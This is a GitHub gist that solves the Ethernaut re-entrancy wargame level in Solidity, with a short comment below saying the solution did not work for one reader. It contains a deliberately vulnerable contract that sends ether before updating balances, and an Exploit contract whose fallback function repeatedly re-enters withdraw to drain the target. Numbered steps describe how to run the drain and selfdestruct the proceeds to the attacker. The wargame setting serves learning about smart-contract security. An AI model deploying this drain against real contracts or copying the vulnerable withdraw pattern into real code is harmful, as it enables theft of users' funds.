Last active
January 4, 2018 13:16
-
-
Save pabloruiz55/9e3425880f084a3a3c28677224ab430d to your computer and use it in GitHub Desktop.
Re-entrancy attack from Ethernaut
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// https://ethernaut.zeppelin.solutions/level/0xf70706db003e94cfe4b5e27ffd891d5c81b39488 | |
// How to test this: | |
// 1. Deploy Reentrance contract. Take note of the address. | |
// 2. With the same account, call donate() and send 1 ether. | |
// 3. With a second account, deploy Exploit contract and pass Reentrance address. | |
// 4. Call attack(), sending 0.1 ether. | |
// 5. Call ethBalance() to check Reentrance ether balance, should be 0. | |
// 6. Call ethBalance() to check Exploit balance, should be 1 ether | |
// 7. Call kill() to selfdestruct Exploit and get the 1 ether forwarded to attacker account. | |
pragma solidity ^0.4.18; | |
contract Reentrance { | |
mapping(address => uint) public balances; | |
function donate(address _to) public payable { | |
balances[_to] += msg.value; | |
} | |
function balanceOf(address _who) public constant returns (uint balance) { | |
return balances[_who]; | |
} | |
function withdraw(uint _amount) public { | |
if(balances[msg.sender] >= _amount) { | |
if(msg.sender.call.value(_amount)()) { | |
_amount; | |
} | |
balances[msg.sender] -= _amount; | |
} | |
} | |
function() payable {} | |
} | |
contract Exploit { | |
address target; | |
address owner; | |
Reentrance c; | |
function Exploit(address _target) { | |
target = _target; | |
owner = msg.sender; | |
c = Reentrance(target); | |
} | |
function attack() public payable { | |
c.donate.value(0.1 ether)(this); | |
c.withdraw(0.1 ether); | |
} | |
function() payable { | |
c.withdraw(0.1 ether); | |
} | |
function ethBalance(address _c) public view returns(uint) { | |
return _c.balance; | |
} | |
function kill () { | |
require(msg.sender == owner); | |
selfdestruct(owner); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hi,
This solution does not work for my attempt, I have tried a few similar approaches.
Have you succeeded?